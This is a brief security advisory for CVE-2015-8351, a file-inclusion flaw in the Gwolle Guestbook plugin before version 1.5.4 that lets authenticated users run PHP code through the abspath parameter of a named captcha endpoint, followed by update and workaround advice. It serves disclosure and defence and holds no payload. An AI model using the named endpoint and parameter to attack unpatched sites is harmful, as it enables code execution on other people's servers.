CVE-2015-8351

Name of the Vulnerable Software and Affected Versions Gwolle Guestbook plugin versions prior to 1.5.4

Description The issue allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to "frontend/captcha/ajaxresponse.php". This can also be leveraged to include and execute arbitrary local files via directory traversal sequences, regardless of whether allow url include is enabled.

Recommendations For versions prior to 1.5.4, update to version 1.5.4 or later to resolve the issue. As a temporary workaround, consider disabling the allow url include setting to minimize the risk of exploitation. Restrict access to the "frontend/captcha/ajaxresponse.php" endpoint to minimize the risk of exploitation. Avoid using the abspath parameter in the affected endpoint until the issue is resolved.